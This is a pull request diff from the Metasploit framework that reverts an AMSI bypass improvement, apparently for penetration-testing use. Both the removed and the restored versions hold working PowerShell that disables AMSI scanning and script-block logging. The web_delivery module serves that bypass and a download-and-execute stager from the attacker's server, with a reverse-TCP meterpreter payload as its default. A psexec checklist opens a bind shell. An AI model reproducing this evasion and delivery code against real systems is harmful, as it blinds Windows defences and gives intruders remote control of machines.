### PR TITLE
Revert "Improve AMSI bypass on new Windows"

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -379,7 +379,7 @@ GEM
       rex-arch
     rex-ole (0.1.7)
       rex-text
-    rex-powershell (0.1.98)
+    rex-powershell (0.1.97)
       rex-random_identifier
       rex-text
       ruby-rc4

--- a/data/evasion/windows/bypass_powershell_protections.erb.graphml
+++ b/data/evasion/windows/bypass_powershell_protections.erb.graphml
@@ -8,19 +8,6 @@
   <key id="instruction.source" for="node" attr.name="instruction.source" attr.type="string"/>
   <key id="instruction.hex" for="node" attr.name="instruction.hex" attr.type="string"/>
   <graph edgedefault="directed">
-    <node id="block.0">
-      <data key="address">1</data>
-      <data key="type">block</data>
-      <graph edgedefault="directed">
-        <data key="address">1</data>
-        <data key="type">block</data>
-        <node id="block.0:instruction.1">
-          <data key="address">2</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">If($PSVersionTable.PSVersion.Major -lt 3){Exit}</data>
-        </node>
-      </graph>
-    </node>
     <node id="block.1">
       <data key="address">1</data>
       <data key="type">block</data>
@@ -30,114 +17,158 @@
         <node id="block.1:instruction.1">
           <data key="address">1</data>
           <data key="type">instruction</data>
-          <data key="instruction.source">$val=[Collections.Generic.Dictionary[string,System.Object]]::new();</data>
+          <data key="instruction.source">If($PSVersionTable.PSVersion.Major -ge 3){</data>
         </node>
         <node id="block.1:instruction.2">
           <data key="address">2</data>
           <data key="type">instruction</data>
-          <data key="instruction.source">$Ref1=[Ref].Assembly.GetType(&lt;%= Rex::Powershell::Obfu.scate_string_literal('System.Management.Automation.AmsiUtils', threshold: 0.3) %&gt;);</data>
+          <data key="instruction.source">    $val=[Collections.Generic.Dictionary[string,System.Object]]::new();</data>
         </node>
         <node id="block.1:instruction.3">
           <data key="address">3</data>
           <data key="type">instruction</data>
-          <data key="instruction.source">If($Ref1) { $Ref1.GetField(&lt;%= Rex::Powershell::Obfu.scate_string_literal('amsiInitFailed', threshold: 1) %&gt;,'NonPublic,Static').SetValue($null,$true); }</data>
+          <data key="instruction.source">    $Ref1=[Ref].Assembly.GetType(&lt;%= Rex::Powershell::Obfu.scate_string_literal('System.Management.Automation.AmsiUtils', threshold: 0.3) %&gt;);</data>
         </node>
         <node id="block.1:instruction.4">
           <data key="address">4</data>
           <data key="type">instruction</data>
-          <data key="instruction.source">$Ref2=[Ref].Assembly.GetType(&lt;%= Rex::Powershell::Obfu.scate_string_literal('System.Management.Automation.Utils') %&gt;);</data>
+          <data key="instruction.source">    if ($Ref1) { $Ref1.GetField(&lt;%= Rex::Powershell::Obfu.scate_string_literal('amsiInitFailed', threshold: 0.3) %&gt;,'NonPublic,Static').SetValue($null,$true); };</data>
         </node>
         <node id="block.1:instruction.5">
           <data key="address">5</data>
           <data key="type">instruction</data>
-          <data key="instruction.source">$GPF=$Ref2.GetField('cachedGroupPolicySettings','NonPublic,Static');</data>
+          <data key="instruction.source">    $Ref2=[Ref].Assembly.GetType(&lt;%= Rex::Powershell::Obfu.scate_string_literal('System.Management.Automation.Utils') %&gt;);</data>
         </node>
         <node id="block.1:instruction.6">
           <data key="address">6</data>
           <data key="type">instruction</data>
-          <data key="instruction.source">$SBL=&lt;%= Rex::Powershell::Obfu.scate_string_literal('ScriptBlockLogging') %&gt;;</data>
+          <data key="instruction.source">    $GPF=$Ref2.GetField('cachedGroupPolicySettings','NonPublic,Static');</data>
         </node>
         <node id="block.1:instruction.7">
           <data key="address">7</data>
           <data key="type">instruction</data>
-          <data key="instruction.source">$EnableSBL=&lt;%= Rex::Powershell::Obfu.scate_string_literal('EnableScriptBlockLogging') %&gt;;</data>
+          <data key="instruction.source">    If ($GPF) {</data>
         </node>
         <node id="block.1:instruction.8">
           <data key="address">8</data>
           <data key="type">instruction</data>
-          <data key="instruction.source">$EnableSBIL=&lt;%= Rex::Powershell::Obfu.scate_string_literal('EnableScriptBlockInvocationLogging') %&gt;;</data>
+          <data key="instruction.source">        $SBL=&lt;%= Rex::Powershell::Obfu.scate_string_literal('ScriptBlockLogging') %&gt;;</data>
         </node>
         <node id="block.1:instruction.9">
           <data key="address">9</data>
           <data key="type">instruction</data>
-          <data key="instruction.source">If($GPF) { $GPC=$GPF.GetValue($null); }</data>
+          <data key="instruction.source">        $EnableSBL=&lt;%= Rex::Powershell::Obfu.scate_string_literal('EnableScriptBlockLogging') %&gt;;</data>
         </node>
-        <edge source="block.1:instruction.2" target="block.1:instruction.3"/>
-        <edge source="block.1:instruction.3" target="block.1:instruction.9"/>
-        <edge source="block.1:instruction.4" target="block.1:instruction.5"/>
-        <edge source="block.1:instruction.5" target="block.1:instruction.9"/>
-      </graph>
-    </node>
-    <node id="block.2">
-      <data key="address">10</data>
-      <data key="type">block</data>
-      <graph edgedefault="directed">
-        <data key="address">10</data>
-        <data key="type">block</data>
-        <node id="block.2:instruction.1">
+        <node id="block.1:instruction.10">
           <data key="address">10</data>
           <data key="type">instruction</data>
-          <data key="instruction.source">If($GPF -And $GPC[$SBL]) { $GPC[$SBL][$EnableSBL]=0; }</data>
+          <data key="instruction.source">        $EnableSBIL=&lt;%= Rex::Powershell::Obfu.scate_string_literal('EnableScriptBlockInvocationLogging') %&gt;;</data>
         </node>
-        <node id="block.2:instruction.2">
+        <node id="block.1:instruction.11">
           <data key="address">11</data>
           <data key="type">instruction</data>
-          <data key="instruction.source">If($GPF -And $GPC[$SBL]) { $GPC[$SBL][$EnableSBIL]=0; }</data>
+          <data key="instruction.source">        $GPC=$GPF.GetValue($null);</data>
         </node>
+        <edge source="block.1:instruction.1" target="block.1:instruction.3"/>
+        <edge source="block.1:instruction.1" target="block.1:instruction.5"/>
+        <edge source="block.1:instruction.3" target="block.1:instruction.4"/>
+        <edge source="block.1:instruction.4" target="block.1:instruction.7"/>
+        <edge source="block.1:instruction.5" target="block.1:instruction.6"/>
+        <edge source="block.1:instruction.6" target="block.1:instruction.7"/>
+        <edge source="block.1:instruction.7" target="block.1:instruction.11"/>
       </graph>
     </node>
-    <node id="block.3">
+    <node id="block.12">
       <data key="address">12</data>
       <data key="type">block</data>
       <graph edgedefault="directed">
         <data key="address">12</data>
         <data key="type">block</data>
-        <node id="block.3:instruction.1">
+        <node id="block.12:instruction.12">
           <data key="address">12</data>
           <data key="type">instruction</data>
-          <data key="instruction.source">If($GPF) { $val.Add($EnableSBL,0); }</data>
+          <data key="instruction.source">        If($GPC[$SBL]){</data>
         </node>
-        <node id="block.3:instruction.2">
+        <node id="block.12:instruction.13">
           <data key="address">13</data>
           <data key="type">instruction</data>
-          <data key="instruction.source">If($GPF) { $val.Add($EnableSBIL,0); }</data>
+          <data key="instruction.source">            $GPC[$SBL][$EnableSBL]=0;</data>
         </node>
-        <node id="block.3:instruction.3">
+        <node id="block.12:instruction.14">
           <data key="address">14</data>
           <data key="type">instruction</data>
-          <data key="instruction.source">If($GPF) { $GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\'+$SBL]=$val; }</data>
+          <data key="instruction.source">            $GPC[$SBL][$EnableSBIL]=0;</data>
         </node>
-        <edge source="block.3:instruction.1" target="block.3:instruction.3"/>
-        <edge source="block.3:instruction.2" target="block.3:instruction.3"/>
-      </graph>
-    </node>
-    <node id="block.4">
-      <data key="address">15</data>
-      <data key="type">block</data>
-      <graph edgedefault="directed">
-        <data key="address">15</data>
-        <data key="type">block</data>
-        <node id="block.4:instruction.1">
+        <node id="block.12:instruction.15">
           <data key="address">15</data>
           <data key="type">instruction</data>
-          <data key="instruction.source">If(!$GPF) { [Ref].Assembly.GetType(&lt;%= Rex::Powershell::Obfu.scate_string_literal('System.Management.Automation.ScriptBlock') %&gt;).GetField('signatures','NonPublic,Static').SetValue($null,(New-Object Collections.Generic.HashSet[string])); }</data>
+          <data key="instruction.source">        }</data>
         </node>
+        <edge source="block.12:instruction.12" target="block.12:instruction.13"/>
+        <edge source="block.12:instruction.12" target="block.12:instruction.14"/>
+        <edge source="block.12:instruction.13" target="block.12:instruction.15"/>
+        <edge source="block.12:instruction.14" target="block.12:instruction.15"/>
       </graph>
     </node>
-    <edge source="block.0" target="block.1"/>
-    <edge source="block.1" target="block.2"/>
-    <edge source="block.1" target="block.3"/>
-    <edge source="block.2" target="block.4"/>
-    <edge source="block.3" target="block.4"/>
+    <node id="block.16">
+      <data key="address">16</data>
+      <data key="type">block</data>
+      <graph edgedefault="directed">
+        <data key="address">16</data>
+        <data key="type">block</data>
+        <node id="block.16:instruction.16">
+          <data key="address">16</data>
+          <data key="type">instruction</data>
+          <data key="instruction.source">        $val.Add($EnableSBL,0);</data>
+        </node>
+        <node id="block.16:instruction.17">
+          <data key="address">17</data>
+          <data key="type">instruction</data>
+          <data key="instruction.source">        $val.Add($EnableSBIL,0);</data>
+        </node>
+        <node id="block.16:instruction.18">
+          <data key="address">18</data>
+          <data key="type">instruction</data>
+          <data key="instruction.source">        $GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\'+$SBL]=$val;</data>
+        </node>
+        <edge source="block.16:instruction.16" target="block.16:instruction.18"/>
+        <edge source="block.16:instruction.17" target="block.16:instruction.18"/>
+      </graph>
+    </node>
+    <node id="block.19">
+      <data key="address">19</data>
+      <data key="type">block</data>
+      <graph edgedefault="directed">
+        <data key="address">19</data>
+        <data key="type">block</data>
+        <node id="block.19:instruction.19">
+          <data key="address">19</data>
+          <data key="type">instruction</data>
+          <data key="instruction.source">    } Else {</data>
+        </node>
+        <node id="block.19:instruction.20">
+          <data key="address">20</data>
+          <data key="type">instruction</data>
+          <data key="instruction.source">        [Ref].Assembly.GetType(&lt;%= Rex::Powershell::Obfu.scate_string_literal('System.Management.Automation.ScriptBlock') %&gt;).GetField('signatures','NonPublic,Static').SetValue($null,(New-Object Collections.Generic.HashSet[string]));</data>
+        </node>
+        <node id="block.19:instruction.21">
+          <data key="address">21</data>
+          <data key="type">instruction</data>
+          <data key="instruction.source">    }</data>
+        </node>
+        <node id="block.19:instruction.22">
+          <data key="address">22</data>
+          <data key="type">instruction</data>
+          <data key="instruction.source">};</data>
+        </node>
+        <edge source="block.19:instruction.19" target="block.19:instruction.20"/>
+        <edge source="block.19:instruction.20" target="block.19:instruction.21"/>
+        <edge source="block.19:instruction.21" target="block.19:instruction.22"/>
+      </graph>
+    </node>
+    <edge source="block.1" target="block.12"/>
+    <edge source="block.1" target="block.16"/>
+    <edge source="block.12" target="block.19"/>
+    <edge source="block.16" target="block.19"/>
   </graph>
 </graphml>

--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -236,7 +236,7 @@ module Exploit::Powershell
 
     prepend_protections_bypass = opts.delete(:prepend_protections_bypass)
     if %w[ auto true ].include?(prepend_protections_bypass)
-      opts[:prepend] = bypass_powershell_protections.join
+      opts[:prepend] = bypass_powershell_protections
     end
 
     unless opts.key? :shorten
@@ -262,12 +262,9 @@ module Exploit::Powershell
   #
   # Return all bypasses checking if PowerShell version > 3
   #
-  # @param split [Integer] The number of parts the final script should be split in
-  #
-  # @return [Array<String>] PowerShell code to disable PowerShell Built-In
-  #   Protections as an array of <split> elements.
-  def bypass_powershell_protections(split = 1)
-    # generate the protections bypass in four short steps
+  # @return [String] PowerShell code to disable PowerShell Built-In Protections
+  def bypass_powershell_protections
+    # generate the protections bypass in three short steps
     # step 1: shuffle the instructions by rendering the GraphML
     script = Rex::Payloads::Shuffle.from_graphml_file(
       File.join(Msf::Config.install_root, 'data', 'evasion', 'windows', 'bypass_powershell_protections.erb.graphml'),
@@ -277,23 +274,7 @@ module Exploit::Powershell
     # step 3: obfuscate variable names and remove whitespace
     script = Rex::Powershell::Script.new(script)
     script.sub_vars if datastore['Powershell::sub_vars']
-    # step 4: randomly split the script in chunks (if required)
-    if split > 1
-      script_lines = script.lines
-      if split > script_lines.size
-        raise "Cannot split in #{split} parts since the command has only #{script_lines.size} lines of code"
-      end
-      vprint_status("Splitting bypass protection script in #{split} parts")
-      script_parts = []
-      (split - 1).times do |part|
-        max_for_this_part = script_lines.size - split + part + 1
-        script_parts << script_lines.shift(rand(1..max_for_this_part)).join
-      end
-      script_parts << script_lines.join
-      script_parts.map { |part| Rex::Powershell::PshMethods.uglify_ps(part) }
-    else
-      [Rex::Powershell::PshMethods.uglify_ps(script.to_s)]
-    end
+    Rex::Powershell::PshMethods.uglify_ps(script.to_s)
   end
 
   #

--- a/modules/exploits/multi/script/web_delivery.rb
+++ b/modules/exploits/multi/script/web_delivery.rb
@@ -3,6 +3,7 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ManualRanking
 
@@ -55,98 +56,97 @@ class MetasploitModule < Msf::Exploit::Remote
           to be served up to be downloaded and executed.
         },
         'License' => MSF_LICENSE,
-        'Author' => [
-          'Andrew Smith "jakx" <jakx.ppr@gmail.com>',
-          'Ben Campbell',
-          'Chris Campbell', # @obscuresec - Inspiration n.b. no relation!
-          'Casey Smith', # AppLocker bypass research and vulnerability discovery (@subTee)
-          'Trenton Ivey', # AppLocker MSF Module (kn0)
-          'g0tmi1k', # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features
-          'bcoles', # support for targets: pubprn, SyncAppvPublishingServer and Linux wget
-          'Matt Nelson', # @enigma0x3 // pubprn discovery
-          'phra', # @phraaaaaaa // https://iwantmore.pizza/ - AMSI/SBL bypass
-          'Nick Landers', # @monoxgas // SyncAppvPublishingServer discovery
-        ],
-        'DefaultOptions' => {
-          'Payload' => 'python/meterpreter/reverse_tcp',
-          'Powershell::exec_in_place' => true
-        },
-        'References' => [
-          ['URL', 'https://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'],
-          ['URL', 'https://www.pentestgeek.com/2013/07/19/invoke-shellcode/'],
-          ['URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],
-          ['URL', 'https://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'],
-          ['URL', 'https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html'],
-          ['URL', 'https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/'],
-          ['URL', 'https://iwantmore.pizza/posts/amsi.html'],
-          ['URL', 'https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/'],
-          ['URL', 'https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/'],
-          ['URL', 'https://lolbas-project.github.io/lolbas/Scripts/Pubprn/'],
-        ],
+        'Author' =>
+          [
+            'Andrew Smith "jakx" <jakx.ppr@gmail.com>',
+            'Ben Campbell',
+            'Chris Campbell', # @obscuresec - Inspiration n.b. no relation!
+            'Casey Smith', # AppLocker bypass research and vulnerability discovery (@subTee)
+            'Trenton Ivey', # AppLocker MSF Module (kn0)
+            'g0tmi1k', # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features
+            'bcoles', # support for targets: pubprn, SyncAppvPublishingServer and Linux wget
+            'Matt Nelson', # @enigma0x3 // pubprn discovery
+            'phra', # @phraaaaaaa // https://iwantmore.pizza/ - AMSI/SBL bypass
+            'Nick Landers', # @monoxgas // SyncAppvPublishingServer discovery
+          ],
+        'DefaultOptions' =>
+          {
+            'Payload' => 'python/meterpreter/reverse_tcp',
+            'Powershell::exec_in_place' => true
+          },
+        'References' =>
+          [
+            ['URL', 'https://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'],
+            ['URL', 'https://www.pentestgeek.com/2013/07/19/invoke-shellcode/'],
+            ['URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],
+            ['URL', 'https://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'],
+            ['URL', 'https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html'],
+            ['URL', 'https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/'],
+            ['URL', 'https://iwantmore.pizza/posts/amsi.html'],
+            ['URL', 'https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/'],
+            ['URL', 'https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/'],
+            ['URL', 'https://lolbas-project.github.io/lolbas/Scripts/Pubprn/'],
+          ],
         'Platform' => %w[python php win linux osx],
-        'Targets' => [
+        'Targets' =>
           [
-            'Python', {
-              'Platform' => 'python',
-              'Arch' => ARCH_PYTHON
-            }
+            [
+              'Python', {
+                'Platform' => 'python',
+                'Arch' => ARCH_PYTHON
+              }
+            ],
+            [
+              'PHP', {
+                'Platform' => 'php',
+                'Arch' => ARCH_PHP
+              }
+            ],
+            [
+              'PSH', {
+                'Platform' => 'win',
+                'Arch' => [ARCH_X86, ARCH_X64]
+              }
+            ],
+            [
+              'Regsvr32', {
+                'Platform' => 'win',
+                'Arch' => [ARCH_X86, ARCH_X64]
+              }
+            ],
+            [
+              'pubprn', {
+                'Platform' => 'win',
+                'Arch' => [ARCH_X86, ARCH_X64]
+              }
+            ],
+            [
+              'SyncAppvPublishingServer', {
+                'Platform' => 'win',
+                'Arch' => [ARCH_X86, ARCH_X64]
+              }
+            ],
+            [
+              'PSH (Binary)', {
+                'Platform' => 'win',
+                'Arch' => [ARCH_X86, ARCH_X64]
+              }
+            ],
+            [
+              'Linux', {
+                'Platform' => 'linux',
+                'Arch' => [ARCH_X86, ARCH_X64]
+              }
+            ],
+            [
+              'Mac OS X', {
+                'Platform' => 'osx',
+                'Arch' => [ARCH_X86, ARCH_X64]
+              }
+            ],
           ],
-          [
-            'PHP', {
-              'Platform' => 'php',
-              'Arch' => ARCH_PHP
-            }
-          ],
-          [
-            'PSH', {
-              'Platform' => 'win',
-              'Arch' => [ARCH_X86, ARCH_X64]
-            }
-          ],
-          [
-            'Regsvr32', {
-              'Platform' => 'win',
-              'Arch' => [ARCH_X86, ARCH_X64]
-            }
-          ],
-          [
-            'pubprn', {
-              'Platform' => 'win',
-              'Arch' => [ARCH_X86, ARCH_X64]
-            }
-          ],
-          [
-            'SyncAppvPublishingServer', {
-              'Platform' => 'win',
-              'Arch' => [ARCH_X86, ARCH_X64]
-            }
-          ],
-          [
-            'PSH (Binary)', {
-              'Platform' => 'win',
-              'Arch' => [ARCH_X86, ARCH_X64]
-            }
-          ],
-          [
-            'Linux', {
-              'Platform' => 'linux',
-              'Arch' => [ARCH_X86, ARCH_X64]
-            }
-          ],
-          [
-            'Mac OS X', {
-              'Platform' => 'osx',
-              'Arch' => [ARCH_X86, ARCH_X64]
-            }
-          ],
-        ],
         'DefaultTarget' => 0,
-        'DisclosureDate' => '2013-07-19',
-        'Notes' => {
-          'Stability' => [CRASH_SAFE],
-          'SideEffects' => [],
-          'Reliability' => []
-        }
+        'DisclosureDate' => '2013-07-19'
       )
     )
 
@@ -154,8 +154,7 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptBool.new('PSH-AmsiBypass', [ true, 'PSH - Request AMSI/SBL bypass before the stager', true ]),
         OptString.new('PSH-AmsiBypassURI', [ false, 'PSH - The URL to use for the AMSI/SBL bypass (Will be random if left blank)', '' ]),
-        OptInt.new('PSH-AmsiBypassSplit', [ true, 'PSH - Split the AMSI bypass script in multiple chunks to for evasion. This value indicates the number of chunks (1 means no split).', 1 ]),
-        OptBool.new('PSH-EncodedCommand', [ true, 'PSH - Use -EncodedCommand for web_delivery launcher', false ]),
+        OptBool.new('PSH-EncodedCommand', [ true, 'PSH - Use -EncodedCommand for web_delivery launcher', true ]),
         OptBool.new('PSH-ForceTLS12', [ true, 'PSH - Force use of TLS v1.2', true ]),
         OptBool.new('PSH-Proxy', [ true, 'PSH - Use the system proxy', true ]),
         OptString.new('PSHBinary-PATH', [ false, 'PSH (Binary) - The folder to store the file on the target machine (Will be %TEMP% if left blank)', '' ]),
@@ -175,13 +174,8 @@ class MetasploitModule < Msf::Exploit::Remote
     when 'PSH'
       uri = get_uri
       if datastore['PSH-AmsiBypass']
-        begin
-          @amsi_bypass_chunks = bypass_powershell_protections(datastore['PSH-AmsiBypassSplit'].to_i)
-        rescue RuntimeError => e
-          fail_with(Msf::Exploit::Failure::BadConfig, "Cannot generate bypass protection script: #{e}")
-        end
-        @amsi_uris = (1..@amsi_bypass_chunks.size).map { |i| "#{amsi_bypass_uri}/#{i}" }
-        print_line(gen_psh(@amsi_uris.map { |u| uri + u } + [uri], 'string').to_s)
+        amsi_uri = uri + amsi_bypass_uri
+        print_line(gen_psh([amsi_uri, uri], 'string').to_s)
       else
         print_line(gen_psh(uri, 'string').to_s)
       end
@@ -205,23 +199,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def amsi_bypass_uri
     unless datastore['PSH-AmsiBypassURI'].empty?
-      @amsi_bypass_uri = datastore['PSH-AmsiBypassURI']
+      @amsi_uri = datastore['PSH-AmsiBypassURI']
     end
-    @amsi_bypass_uri ||= random_uri
-  end
-
-  def force_tls12_uri
-    @force_tls12_uri ||= random_uri
-  end
-
-  def proxy_aware_uri
-    @proxy_aware_uri ||= random_uri
+    @amsi_uri ||= random_uri
   end
 
   def on_request_uri(cli, request)
-    uri = request.raw_uri.to_s
-
-    if uri.ends_with?('.sct')
+    if request.raw_uri.to_s.ends_with?('.sct')
       print_status('Handling .sct Request')
       psh = gen_psh(get_uri.to_s, 'string')
 
@@ -238,27 +222,9 @@ class MetasploitModule < Msf::Exploit::Remote
       return
     end
 
-    if datastore['PSH-AmsiBypass'] && uri.ends_with?(*@amsi_uris)
-      if @amsi_bypass_chunks.blank?
-        @amsi_bypass_chunks = bypass_powershell_protections(datastore['PSH-AmsiBypassSplit'].to_i)
-      end
-      chunk_nb = uri.split('/').last
-      data = @amsi_bypass_chunks[chunk_nb.to_i - 1]
-      print_status("Delivering AMSI Bypass #{chunk_nb}/#{@amsi_bypass_chunks.size}(#{data.length} bytes)")
-      send_response(cli, data, 'Content-Type' => 'text/plain')
-      return
-    end
-
-    if ssl && datastore['PSH-ForceTLS12'] && uri.ends_with?(force_tls12_uri)
-      data = Rex::Powershell::PshMethods.force_tls12
-      print_status("Delivering ForceTLS12 command (#{data.length} bytes)")
-      send_response(cli, data, 'Content-Type' => 'text/plain')
-      return
-    end
-
-    if datastore['PSH-Proxy'] && uri.ends_with?(proxy_aware_uri)
-      data = Rex::Powershell::PshMethods.proxy_aware
-      print_status("Delivering Proxy Aware command (#{data.length} bytes)")
+    if request.raw_uri.to_s.ends_with?(amsi_bypass_uri)
+      data = bypass_powershell_protections
+      print_status("Delivering AMSI Bypass (#{data.length} bytes)")
       send_response(cli, data, 'Content-Type' => 'text/plain')
       return
     end
@@ -267,13 +233,9 @@ class MetasploitModule < Msf::Exploit::Remote
     when 'Linux', 'Mac OS X', 'PSH (Binary)'
       data = generate_payload_exe
     when 'PSH', 'Regsvr32', 'pubprn', 'SyncAppvPublishingServer'
-      # Disable this option since the Powershell protection bypass should been done already.
-      opts = {}
-      opts[:prepend_protections_bypass] = false if datastore['PSH-AmsiBypass']
       data = cmd_psh_payload(
         payload.encoded,
-        payload_instance.arch.first,
-        opts
+        payload_instance.arch.first
       )
     else
       data = payload.encoded.to_s
@@ -284,13 +246,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def gen_psh(url, *method)
-    ignore_cert = ssl ? Rex::Powershell::PshMethods.ignore_ssl_certificate : ''
-    prepended_actions = []
-    prepended_actions << "#{get_uri}#{force_tls12_uri}" if ssl && datastore['PSH-ForceTLS12']
+    ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
+    force_tls12 = Rex::Powershell::PshMethods.force_tls12 if datastore['PSH-ForceTLS12']
 
     if method.include? 'string'
-      prepended_actions << "#{get_uri}#{proxy_aware_uri}" if datastore['PSH-Proxy']
-      download_string = Rex::Powershell::PshMethods.download_and_exec_string(url)
+      download_string = datastore['PSH-Proxy'] ? Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url) : Rex::Powershell::PshMethods.download_and_exec_string(url)
     else
       # Random filename to use, if there isn't anything set
       random = "#{rand_text_alphanumeric(8)}.exe"
@@ -308,7 +268,7 @@ class MetasploitModule < Msf::Exploit::Remote
       download_string = Rex::Powershell::PshMethods.download_run(url, file)
     end
 
-    download_and_run = "#{ignore_cert}#{Rex::Powershell::PshMethods.download_and_exec_string(prepended_actions)}#{download_string}"
+    download_and_run = "#{force_tls12}#{ignore_cert}#{download_string}"
 
     # Generate main PowerShell command
     if datastore['PSH-EncodedCommand']


### PR DESCRIPTION
This reverts commit f97ab802248068af0bfc1a2763509dd1b6db3bc8, reversing changes made to c8f942cc034b1fe7f75ab304411d19f7e41ff41a.

This change impacted the default `psexec` powershell target and needs further testing to be reintroduced.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/smb/psexec`
- [ ] `set SMBUser user`
- [ ] `set SMBPass pass`
- [ ] `set RHOSTS hostname`
- [ ] `set payload windows/x64/meterpreter/bind_tcp`
- [ ]  `run`
- [ ] **Verify** target bind shell is opened when valid config is used
